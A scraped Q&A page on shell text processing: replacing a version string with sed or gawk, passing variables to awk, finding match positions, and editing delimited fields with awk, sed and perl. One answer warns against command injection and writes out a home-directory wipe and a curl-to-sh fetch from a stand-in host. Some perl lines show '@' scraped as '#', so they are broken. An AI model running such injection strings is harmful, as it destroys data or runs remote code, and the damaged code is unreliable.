Shell: Subsitute a string between 2 Known strings - shell

I wish to replace the contents of new_version varaiable (13.2.0/8) in between abc_def_APP and application1.war strings in file1
Script :
#!/bin/ksh
new_version="13.0.5/8"
old_version=($(grep -r "location=.*application1.war" /path/file1| awk '{print ($1)}'| cut -f8- -d"/"|sed 's/.\{1\}$//'))
echo "$old_version" 'This gives me version number from file1 which needs to be replaced(13.2.0/9)
File1 Contents:
location="cc://view/blah/blah/blah/abc_def_APP/13.2.0/9/application1.war"

Use following sed command to have your replacement:
sed -i.bak -r "s#^(.*/abc_def_APP/).*(/application1\.war.*)#\1$version1/$version2\2#" /path/file1

With GNU awk (for gensub()):
$ cat file
location="cc://view/blah/blah/blah/abc_def_APP/13.2.0/9/application1.war"
$ new_version="13.2.0/8"
$ gawk -v nv="$new_version" '{$0=gensub(/^(location.*abc_def_APP\/).*(\/application1.war.*)/,"\\1" nv "\\2","")}1' file
location="cc://view/blah/blah/blah/abc_def_APP/13.2.0/8/application1.war"
The difference between this and a sed solution is that awk doesn't require you to jump through hoops due to your new_version variable containing a "/" (or any other character).

Related

awk: using bash variable inside the awk script

The following bash code incorporates the awk code to fuse file1 and file2 in the special fashion, detecting some blocks in the file2 and inserting there all strings from the file1.
#!/bin/bash
# v 0.09 beta
file1=/usr/data/temp/data1.pdb
file2=/usr/data/temp/data2.pdb
# merge the both
awk -v file="${file1}" '/^ENDMDL$/ {system("cat file");}; {print}' "${results}"/"${file2} >> output.pdb
The problem that I can not use in the awk part the variable "file", which relates to the file1 defined in bash
{system("cat file");}
othervise if I past here the full path of the file1 it works well
{system("cat /usr/data/temp/data1.pdb");}
how I could fix my awk code to be able using directly a bash variable there?
The Literal (But Evil, Insecure) Answer
To answer your literal question:
awk -v insecure="filename" 'BEGIN { system("cat " insecure) }'
...will run cat filename.
But if someone passed insecure="filename; rm -rf ~" or insecure='$(curl http://evil.co | sh)', you'd have a very bad day.
The Right Answer
Pass the filename on awk's command line, and check FNR to see if you're reading the first file or a subsequent one.
Use GNU Awk's readfile library:
gawk -i readfile -v file1="$file1" 'BEGIN { file1_data = readfile(file1) }
/^ENDMDL$/ { printf "%s", file1_data } 1' ...
Alternative you can use a while ((getline < file1) > 1) loop to fetch the data.
This is easier with sed
$ sed '/^ENDMDL$/r file1' file2
inserts file1 after the marker.
to replace the marker line with the file1 contents
$ sed -e '/^ENDMDL$/{r file1' -e 'd}' file2

Grep - Getting the character position in the line of each occurrence

According to the manual, the option -b can give the byte offset of a given occurence, but it seems to start from the beginning of the parsed content.
I need to retrieve the position of each matching content returned by grep. I used this line, but it's quite ugly:
grep '<REGEXP>' | while read -r line ; do echo $line | grep -bo '<REGEXP>' ; done
How to get it done in a more elegant way, with a more efficient use of GNU utils?
Example:
$ echo "abcdefg abcdefg" > test.txt
$ grep 'efg' | while read -r line ; do echo $line | grep -bo 'efg' ; done < test.txt
4:efg
12:efg
(Indeed, this command line doesn't output the line number, but it's not difficult to add it.)
With any awk (GNU or otherwise) in any shell on any UNIX box:
$ awk -v re='efg' -v OFS=':' '{
end = 0
while( match(substr($0,end+1),re) ) {
print NR, end+=RSTART, substr($0,end,RLENGTH)
end+=RLENGTH-1
}
}' test.txt
1:5:efg
1:13:efg
All strings, fields, array indices in awk start at 1, not zero, hence the output not looking like yours since to awk your input string is:
123456789012345
abcdefg abcdefg
rather than:
012345678901234
abcdefg abcdefg
Feel free to change the code above to end+=RSTART-1 and end+=RLENGTH if you prefer 0-indexed strings.
Perl is not a GNU util, but can solve your problem nicely:
perl -nle 'print "$.:$-[0]" while /efg/g'

Replace third column on all rows of a file in shell

I have a file that has about 60 columns of data. The file is also about 80 million records long. I need a bash command to replace the third column with '20190113'. How do we determine it is the third column? It is delimited by the non-printable character '\001'
So replace the third field on all records of data in a file delimited by the special character '\001' with the value '20190113;
awk can handle non-printing characters, including \001.
$ cat -v test.in
abc^Axyz^Afoo
def^Awvu^Abar
$ awk '{$3 = "20190113"}1' FS=$'\1' OFS=$'\1' test.in | cat -v
abc^Axyz^A20190113
def^Awvu^A20190113
$'…' is a construction supported by most shells that lets you use escape characters.
^A represents the \001 character; -v tells cat to print that instead of a literal non-printing \001 byte.
Not as elegant as awk, but here is method with sed.
a=$(printf "1\0012\0013\0014\0015")
# check
echo "$a" | hexdump -c
b=$(echo "$a" | sed -r 's/([^\x01]*\x01[^\x01]*\x01)[^\x01]*[^x01]/\120190113\x01/')
# check
echo "$b" | hexdump -c
You can use the hex format "\xdd" to specify the delimiters for awk.
Just set the Input and Output delimiters in the BEGIN section.
$ cat -v brian.txt
abc^Axyz^Afoo
def^Awvu^Abar
$ awk ' BEGIN{ FS=OFS="\x01"} { $3="20190113"; print } ' brian.txt
abcxyz20190113
defwvu20190113
$ awk ' BEGIN{ FS=OFS="\x01"} { $3="20190113"; print } ' brian.txt | cat -v
abc^Axyz^A20190113
def^Awvu^A20190113
$
You can try with Perl also
$ perl -F"\x01" -lane ' $F[2]="20190113"; print join("\x01",#F) ' brian.txt
abcxyz20190113
defwvu20190113
$ perl -F"\x01" -lane ' $F[2]="20190113"; print join("\x01",#F) ' brian.txt | cat -v
abc^Axyz^A20190113
def^Awvu^A20190113
$
This might work for you (GNU sed):
sed 's/[^[.\d1.]]*/20190113/3' file
This replaces the third occurrence of those characters that do not match \001 with the string 20190113 on every line throughout the file.

BASH: grep text in a long string

Can anyone explain how to write a regex to get a value in a very long txt file full of meta. The whole file is without any newline separators, just a very long string, which is hard to read or analyze
I need to grep values after key username. Can anyone help? Seem to be stuck writing out a proper regex exression for this case
.."somevalue\";s:7:\"text1\";s:8:\"username\";s:9:\"USER1\";s:7:\"company\";s:3:\"text2\";s:5:\ "somevalue\";s:11:\"text11\";s:8:\"username\";s:15:\"USER2\";s:7:\"company\";s:17:\"XXXX\";s:5:\... "somevalue\";s:15:\"text110000\";s:8:\"username\";s:12:\"USER3_HERE\";s:7:\"company\";s:18:\"yyyyy\";s:
In the above example I need the following output
USER1
USER2
USER3_HERE
With Perl it is
perl -wn -le 'print for /\\"username\\";.*?\\"([^\\"]+)/g' filename
-n - process file line by line, but don't print anything
-l - handle line endings
-e - run the following code
print for /\\"username\\";.*?\\"([^\\"]+)/g
Print the captured output whenever you see \"username\"; followed by something followed by \" .
Output
$ perl -wn -le 'print for /\\"username\\";.*?\\"([^\\"]+)/g'
.."somevalue\";s:7:\"text1\";s:8:\"username\";s:9:\"USER1\";s:7:\"company\";s:3:\"text2\";s:5:\ "somevalue\";s:11:\"text11\";s:8:\"username\";s:15:\"USER2\";s:7:\"company\";s:17:\"XXXX\";s:5:\... "somevalue\";s:15:\"text110000\";s:8:\"username\";s:12:\"USER3_HERE\";s:7:\"company\";s:18:\"yyyyy\";s:
USER1
USER2
USER3_HERE
See also
perlrun for the command line switches
perlre for the regular expression used
For the input lokking like this:
cat <<EOF >file
s:7:\"text1\";s:8:\"username\";s:9:\"USER1\";s:7:\"company\";s:3:\"text2\";s:5:\ "somevalue\";s:11:\"text11\";s:8:\"username\";s:15:\"USER2\";s:7:\"company\";s:17:\"XXXX\";s:5:\... "somevalue\";s:15:\"text110000\";s:8:\"username\";s:12:\"USER3_HERE\";s:7:\"company\";s:18:\"yyyyy\";
EOF
We can:
< file \
tr ';' '\n' |
sed 's/^.*:\\"\(.*\)\\"$/\1/' |
grep -x "USER1\|USER2\|USER3_HERE"
substitute the ; for newline
filter out the text in between the :\"...\"
grep only for USER1 USER2 or USER3_HERE strings
With GNU awk (I added the printout of the field number for clarity here with printing i in front of $i):
$ gawk 'BEGIN{FS="\\\\\""} {for (i=1;i<=NF;i++) if (match($i, /USER/)) print i, $i}' file
7 USER1
18 USER2
29 USER3_HERE
If you want the field following those fields:
$ gawk 'BEGIN{FS="\\\\\""} {for (i=1;i<=NF;i++) if (match($i, /USER/)) print $i, $(i+1)}' file
USER1 ;s:7:
USER2 ;s:7:
USER3_HERE ;s:7:
You can use GNU grep:
$ ggrep -oP 'USER[^;]*;([^\\]*)\\"company' file
USER1\";s:7:\"company
USER2\";s:7:\"company
USER3_HERE\";s:7:\"company
Or Perl if you just want the match group:
$ perl -lnE 'say for /USER[^;]*;([^\\]*)\\"company/g' file
s:7:
s:7:
s:7:

replacing strings in a configuration file with shell scripting

I have a configuration file with fields separated by semicolons ;. Something like:
user#raspberrypi /home/pi $ cat file
string11;string12;string13;
string21;string22;string23;
string31;string32;string33;
I can get the strings I need with awk:
user#raspberrypi /home/pi $ cat file | grep 21 | awk -F ";" '{print $2}'
string22
And I'd like to change string22 to hello_world via a script.
Any idea how to do it? I think it should be with sed but I have no idea how.
I prefer perl better than sed. Here a one-liner that modifies the file in-place.
perl -i -F';' -lane '
BEGIN { $" = q|;| }
if ( m/21/ ) { $F[1] = q|hello_world| };
print qq|#F|
' infile
Use -i.bak instead of -i to create a backup file with .bak as suffix.
It yields:
string11;string12;string13
string21;hello_world;string23
string31;string32;string33
First drop the useless use of cat and grep so:
$ cat file | grep 21 | awk -F';' '{print $2}'
Becomes:
$ awk -F';' '/21/{print $2}' file
To change this value you would do:
$ awk '/21/{$2="hello_world"}1' FS=';' OFS=';' file
To store the changes back to the file:
$ awk '/21/{$2="hello_world"}1' FS=';' OFS=';' file > tmp && mv tmp file
However if all you want to do is replace string22 with hello_world I would suggest using sed instead:
$ sed 's/string22;/hello_world;/g' file
With sed you can use the -i option to store the changes back to the file:
$ sed -i 's/string22;/hello_world;/g' file
Even though we can do this in awkeasily as Sudo suggested i prefer perl since it does inline replacement.
perl -pe 's/(^[^\;]*;)[^\;]*(;.*)/$1hello_world$2/g if(/21/)' your_file
for in line just add an i
perl -pi -e 's/(^[^\;]*;)[^\;]*(;.*)/$1hello_world$2/g if(/21/)' your_file
Tested below:
> perl -pe 's/(^[^\;]*;)[^\;]*(;.*)/$1"hello_world"$2/g if(/21/)' temp
string11;string12;string13;
string21;"hello_world";string23;
string31;string32;string33;
> perl -pe 's/(^[^\;]*;)[^\;]*(;.*)/$1hello_world$2/g if(/21/)' temp
string11;string12;string13;
string21;hello_world;string23;
string31;string32;string33;
>

Resources